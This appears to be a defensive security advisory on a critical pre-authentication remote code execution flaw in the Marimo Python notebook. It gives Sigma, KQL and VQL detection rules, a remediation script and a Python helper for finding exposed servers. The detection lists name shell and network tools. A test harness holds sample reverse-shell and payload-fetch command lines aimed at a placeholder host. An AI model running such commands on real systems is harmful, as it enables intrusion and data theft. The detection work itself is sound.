Executive Summary: A critical vulnerability (CVE-2026-39987) has been identified in Marimo, an open-source reactive notebook for Python. Rated CVSS 9.3 (Critical), this pre-authentication Remote Code Execution (RCE) flaw allows unauthenticated attackers to execute arbitrary code on the host running the notebook server. According to Sysdig, active exploitation began within 10 hours of public disclosure. Because data science environments frequently hold credentials, proprietary models and datasets, and are often run with elevated privileges, this represents an immediate and severe threat to infrastructure integrity.
Introduction
For data science and engineering teams, tools like Marimo are essential for interactive analysis. Those same tools are prime targets for initial access brokers, because a notebook server is by design a remote code execution service with access to data and credentials. The disclosure of CVE-2026-39987 is alarming not only because of its severity but because of how quickly it was weaponized.
This is not a theoretical risk. The vulnerability bypasses authentication entirely, so any reachable Marimo endpoint is an open door for threat actors to deploy ransomware, conduct supply-chain attacks, or exfiltrate proprietary models and datasets. Defenders must assume that scanning and exploitation attempts are already under way against public-facing instances.
Technical Analysis
- Affected Product: Marimo (Open-source Python notebook)
- CVE Identifier: CVE-2026-39987
- CVSS Score: 9.3 (Critical)
- Affected Versions: All releases prior to the fixed release (check the official advisory for the exact fixed build; do not rely on "latest" in a pinned environment).
- Vulnerability Type: Pre-authentication Remote Code Execution (RCE); no credentials are required.
How the Exploit Works: The vulnerability lies in how Marimo's server interface handles specific requests. A specially crafted request to the vulnerable endpoint, sent without any credentials, causes the Marimo Python process to execute attacker-controlled code. The exact request-handling defect is not reproduced here; what matters for defenders is that it is reachable from the network without authentication and that the code runs with the privileges of the notebook server process.
Attack Chain:
- Discovery: The attacker scans for Marimo instances (default TCP port 2718, or the notebook's web paths behind a reverse proxy).
- Exploitation: The attacker sends the malicious request to the vulnerable endpoint without providing credentials.
- Execution: The Marimo Python process executes the attacker's code, typically spawning a shell (often a reverse shell) or fetching a second-stage payload with a network utility.
- Post-Exploitation: The attacker establishes persistence, harvests credentials and tokens available to the notebook, moves laterally, or steals data.
Exploitation Status: CONFIRMED ACTIVE EXPLOITATION. Security researchers observed exploitation in the wild (ITW) within 10 hours of the initial public disclosure. Assume that public proof-of-concept (PoC) code exists.
Detection & Response
Given the speed of exploitation, network-based detection is a weak first line: the exploit request is ordinary HTTP to the notebook endpoint, so a network signature only works once the exact payload is known, and it fails the moment the payload is varied. Endpoint telemetry is payload-independent: whatever the request looks like, a successful exploit shows up as the Marimo process doing something a notebook server should not do.
The following Sigma rules, KQL queries, and VQL artifacts detect that effect: the Python process running Marimo spawning a shell or a network utility. Note the one legitimate source of the same pattern, a user cell that calls subprocess with a shell; baseline that per user rather than suppressing the rule.
Sigma Rules
```yaml
title: Potential Marimo RCE - Python Spawning Shell
id: 8a4b3c2d-1e9f-4a5b-bc6d-7e8f9a0b1c2d
status: experimental
description: Detects the Marimo application (running via Python) spawning a shell, a strong indicator of successful RCE exploitation of CVE-2026-39987.
references:
  - https://thehackernews.com/2026/04/marimo-rce-flaw-cve-2026-39987.html
author: Security Arsenal
date: 2026-04-06
tags:
  - attack.execution
  - attack.t1059.004
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    # Match versioned interpreter binaries too (python3, python3.12)
    ParentImage|re: '/python[0-9.]*$'
    ParentCommandLine|contains: 'marimo'
    Image|endswith:
      - '/bash'
      - '/sh'
      - '/dash'
      - '/zsh'
  condition: selection
falsepositives:
  - Legitimate administrative debugging by data scientists (rare in production notebooks)
  - Notebook cells that deliberately run subprocess with a shell; baseline per user
level: critical
```
```yaml
title: Potential Marimo RCE - Spawning Network Utilities
id: 9b5c4d3e-2f0a-5b6c-cd7e-8f9a0b1c2d3e
status: experimental
description: Detects the Marimo application spawning curl, wget, or nc, often used for beaconing or data exfiltration post-exploitation.
references:
  - https://thehackernews.com/2026/04/marimo-rce-flaw-cve-2026-39987.html
author: Security Arsenal
date: 2026-04-06
tags:
  - attack.command_and_control
  - attack.t1105
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    # Match versioned interpreter binaries too (python3, python3.12)
    ParentImage|re: '/python[0-9.]*$'
    ParentCommandLine|contains: 'marimo'
    Image|endswith:
      - '/curl'
      - '/wget'
      - '/nc'
      - '/ncat'
      - '/netcat'
  condition: selection
falsepositives:
  - Legitimate data fetching workflows (validate against known user behavior)
level: high
```
**Microsoft Sentinel / Defender KQL**
```kusto
// Hunt for Marimo RCE activity: Python processes running Marimo spawning shells or network tools
DeviceProcessEvents
| where Timestamp > ago(1d)
// Interpreter binaries are often versioned (python3.12), so match on the prefix
| where InitiatingProcessFileName startswith "python" or InitiatingProcessFileName in~ ("uwsgi", "gunicorn", "uvicorn")
| where InitiatingProcessCommandLine has "marimo"
// Python spawning python is normal notebook behaviour; shells and network tools are not
| where FileName in~ ("bash", "sh", "dash", "zsh", "curl", "wget", "nc", "ncat", "netcat")
| project Timestamp, DeviceName, AccountName, InitiatingProcessCommandLine, FileName, ProcessCommandLine
```
**Velociraptor VQL**
```vql
-- Hunt for Marimo RCE indicators: shells or network tools whose parent is a Python process running Marimo.
-- pslist() is a point-in-time snapshot; pair it with process-creation telemetry for shells that already exited.
SELECT * FROM foreach(
  row={
    SELECT Pid AS ChildPid, Ppid, Name AS ChildName, CommandLine AS ChildCmd, Username, CreateTime
    FROM pslist()
    WHERE Name =~ "^(bash|sh|dash|zsh|curl|wget|nc|ncat|netcat)$"
  },
  query={
    SELECT ChildPid, ChildName, ChildCmd, Username, CreateTime,
           Pid AS ParentPid, Name AS ParentName, CommandLine AS ParentCmd
    FROM pslist(pid=Ppid)
    WHERE Name =~ "^python" AND CommandLine =~ "marimo"
  })
```
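The three hunts above all encode the same parent/child logic. The following is an added example, not code from the original page or from the Marimo project: it applies that logic to a handful of constructed process-creation events so the rule can be exercised offline. The event fields (ParentImage, ParentCommandLine, Image, CommandLine) are a generic normalisation assumed for the example, not the schema of any particular EDR, and the sample events, IPs and command lines are invented. It also shows the two edge cases the hunts need to get right: versioned interpreter names such as python3.12, and basename matching that is anchored so that "sh" does not match sshd.

```python
"""Offline check of the Marimo RCE hunt logic on constructed telemetry (added example)."""
import re
from typing import Iterable, List, Optional

# Interpreter binaries may be versioned (python3, python3.12): anchor on the basename
PYTHON_RE = re.compile(r"/python[0-9.]*$")
# Anchored so that "sh" does not match sshd, ssh or fish
SHELL_RE = re.compile(r"/(bash|sh|dash|zsh)$")
NET_RE = re.compile(r"/(curl|wget|nc|ncat|netcat)$")


def classify(event: dict) -> Optional[str]:
    """Return 'shell', 'net' or None for one process-creation event."""
    parent = event.get("ParentImage", "")
    parent_cmd = event.get("ParentCommandLine", "")
    child = event.get("Image", "")
    # Only Python processes whose command line identifies them as Marimo are in scope
    if not PYTHON_RE.search(parent) or "marimo" not in parent_cmd:
        return None
    if SHELL_RE.search(child):
        return "shell"
    if NET_RE.search(child):
        return "net"
    return None


def hunt(events: Iterable[dict]) -> List[dict]:
    """Return the events that fire, each annotated with the alert kind."""
    hits = []
    for ev in events:
        kind = classify(ev)
        if kind:
            hits.append({**ev, "alert": kind})
    return hits


# Constructed sample telemetry (not real captures; addresses are documentation ranges)
SAMPLE_EVENTS = [
    # True positive: the Marimo server spawns bash with a reverse-shell one-liner
    {"ParentImage": "/usr/bin/python3.12",
     "ParentCommandLine": "/usr/bin/python3.12 -m marimo edit --host 0.0.0.0 --port 2718",
     "Image": "/usr/bin/bash",
     "CommandLine": "bash -c 'exec 5<>/dev/tcp/198.51.100.7/4444; ...'"},
    # True positive: the Marimo server spawns curl to fetch a second stage
    {"ParentImage": "/opt/venv/bin/python",
     "ParentCommandLine": "/opt/venv/bin/python /opt/venv/bin/marimo run app.py",
     "Image": "/usr/bin/curl",
     "CommandLine": "curl -fsSL http://198.51.100.7/stage2 -o /tmp/.x"},
    # Benign: Marimo spawning another python process is normal and is ignored
    {"ParentImage": "/usr/bin/python3",
     "ParentCommandLine": "python3 -m marimo edit nb.py",
     "Image": "/usr/bin/python3",
     "CommandLine": "python3 -c 'import marimo'"},
    # Benign: a non-Marimo python job running a shell (e.g. a cron ETL script)
    {"ParentImage": "/usr/bin/python3",
     "ParentCommandLine": "python3 /opt/etl/nightly.py",
     "Image": "/usr/bin/sh",
     "CommandLine": "sh -c 'rsync ...'"},
    # Benign: sshd, whose name contains "sh" but is not a shell
    {"ParentImage": "/usr/bin/python3",
     "ParentCommandLine": "python3 -m marimo edit nb.py",
     "Image": "/usr/sbin/sshd",
     "CommandLine": "sshd -D"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(f"[{hit['alert'].upper()}] {hit['Image']} <- {hit['ParentCommandLine']}")
```

Run against the samples, only the first two events fire. The unanchored `bash|sh|...` pattern in the original VQL would also have matched the sshd event; feed your own EDR's process-creation export through `hunt()` to check how noisy the rule is before deploying it.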
**Remediation Script (Bash)**
```bash
#!/usr/bin/env bash
# Remediation script for CVE-2026-39987 (Marimo RCE)
# Checks the installed Marimo version and upgrades it to the latest release on PyPI.
# Run it with the interpreter/virtualenv that actually serves Marimo (override PIP),
# otherwise you will patch a different install than the one that is exposed.
set -euo pipefail

PIP="${PIP:-python3 -m pip}"

if ! $PIP show marimo >/dev/null 2>&1; then
    echo "[-] Marimo is not installed for: $($PIP --version). Exiting."
    exit 0
fi

CURRENT_VERSION=$($PIP show marimo | awk -F': ' '/^Version:/ {print $2}')
echo "[+] Current Marimo version detected: $CURRENT_VERSION"
echo "[!] CVE-2026-39987 (CVSS 9.3) is a critical pre-authentication RCE."
echo "[*] Upgrading Marimo to the latest release..."

$PIP install --upgrade marimo

UPGRADED_VERSION=$($PIP show marimo | awk -F': ' '/^Version:/ {print $2}')
echo "[+] Post-upgrade Marimo version: $UPGRADED_VERSION"

if [ "$CURRENT_VERSION" != "$UPGRADED_VERSION" ]; then
    echo "[+] Upgrade successful ($CURRENT_VERSION -> $UPGRADED_VERSION)."
    echo "[ACTION REQUIRED] Restart all Marimo servers/notebooks immediately so the patched code is loaded."
else
    echo "[*] Version unchanged: either already current or pinned. Verify manually against the vendor advisory."
fi
```
Remediation
- Patch Immediately: Apply the latest security update released by the Marimo team. Do not delay. Since active exploitation is confirmed, treat this as an active incident rather than a routine patch cycle.
- Update Command: Run the following in every environment (virtualenv, conda env, container image) where Marimo is installed: pip install --upgrade marimo
- Restart Services: Updating the package is not enough while the old process is still running in memory. Restart the Marimo server/notebook instances to load the patched code.
- Network Segmentation: Marimo instances should not be exposed directly to the public internet. Bind the server to localhost and place it behind a VPN, a Zero Trust Network Access (ZTNA) solution, or an authenticating reverse proxy (e.g., Nginx with OAuth2 Proxy) so that port 2718 is not reachable without passing the proxy.
- Compromise Assessment: If a Marimo instance was exposed to the internet before patching, assume compromise. Review process-creation telemetry for the anomalies described in the Detection section, and rotate any credentials, API keys or cloud tokens that the notebook process could read.
Official Vendor Advisory: Check the Marimo GitHub repository or PyPI for the specific patched version number and release notes.
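To act on the segmentation and compromise-assessment points, you first need to know which hosts have a Marimo server listening on a non-loopback address. The helper below is an added example, not part of the original page or of Marimo: it parses `ss -ltnp` output, resolves each listening pid to its command line, and flags Marimo servers bound to anything other than 127.0.0.0/8 or ::1. The `ss` text and the pid-to-command-line table are constructed for the example; on a live host pass the real `ss -ltnp` output and omit the table so the helper reads /proc/<pid>/cmdline itself.

```python
"""Flag Marimo servers listening on non-loopback addresses from `ss -ltnp` output (added example)."""
import ipaddress
import re
from typing import Dict, List, Optional

# One entry in the Process column looks like ("python3",pid=4242,fd=7); there may be several
PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+),fd=\d+\)')
# Local Address:Port column: IPv4 "0.0.0.0:2718", IPv6 "[::]:2718", or wildcard "*:2718"
ADDR_RE = re.compile(r"^(\[[^\]]+\]|[^\s:]+):(\d+)$")

# Constructed `ss -ltnp` output for the example (not a real capture)
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      2048   0.0.0.0:2718        0.0.0.0:*         users:(("python3",pid=4242,fd=7))
LISTEN 0      2048   127.0.0.1:2719      0.0.0.0:*         users:(("python3",pid=4310,fd=7))
LISTEN 0      2048   [::]:2720           [::]:*            users:(("python",pid=4400,fd=9))
LISTEN 0      511    *:8080              *:*               users:(("nginx",pid=911,fd=6),("nginx",pid=912,fd=6))
"""

# Constructed stand-in for /proc/<pid>/cmdline on the sample host
SAMPLE_CMDLINES = {
    4242: "python3 -m marimo edit --host 0.0.0.0 --port 2718 analysis.py",
    4310: "python3 -m marimo run dashboard.py --port 2719",
    4400: "python -m marimo edit --host :: --port 2720",
    911: "nginx: master process",
}


def read_cmdline(pid: int, table: Optional[Dict[int, str]] = None) -> str:
    """Command line for pid, from the supplied table or else from /proc."""
    if table is not None:
        return table.get(pid, "")
    try:
        with open(f"/proc/{pid}/cmdline", "rb") as fh:
            return fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
    except OSError:
        return ""


def is_loopback(addr: str) -> bool:
    """True only for 127.0.0.0/8 and ::1; wildcard binds count as exposed."""
    addr = addr.strip("[]")
    if addr in ("*", "0.0.0.0", "::"):
        return False
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False


def parse_ss(text: str) -> List[dict]:
    """Parse LISTEN rows of `ss -ltnp` into bind address, port and owning processes."""
    listeners = []
    for line in text.splitlines():
        cols = line.split()
        if len(cols) < 5 or cols[0] != "LISTEN":
            continue  # header or unrelated row
        m = ADDR_RE.match(cols[3])
        if not m:
            continue
        procs = [(name, int(pid)) for name, pid in PROC_RE.findall(line)]
        listeners.append({"addr": m.group(1), "port": int(m.group(2)), "procs": procs})
    return listeners


def marimo_listeners(text: str, cmdlines: Optional[Dict[int, str]] = None) -> List[dict]:
    """Every listening process whose command line mentions marimo, with an exposure flag."""
    findings = []
    for lst in parse_ss(text):
        for _name, pid in lst["procs"]:
            cmd = read_cmdline(pid, cmdlines)
            if "marimo" not in cmd:
                continue
            findings.append({"pid": pid, "port": lst["port"], "bind": lst["addr"],
                             "exposed": not is_loopback(lst["addr"]), "cmdline": cmd})
    return findings


if __name__ == "__main__":
    for f in marimo_listeners(SAMPLE_SS, SAMPLE_CMDLINES):
        flag = "EXPOSED " if f["exposed"] else "loopback"
        print(f"[{flag}] pid={f['pid']} {f['bind']}:{f['port']}  {f['cmdline']}")
```

On the sample host the instances on 0.0.0.0:2718 and [::]:2720 are reported as exposed while the one on 127.0.0.1:2719 is not. An exposed instance that predates the patch is the trigger for the compromise-assessment step above, not just for re-binding the server.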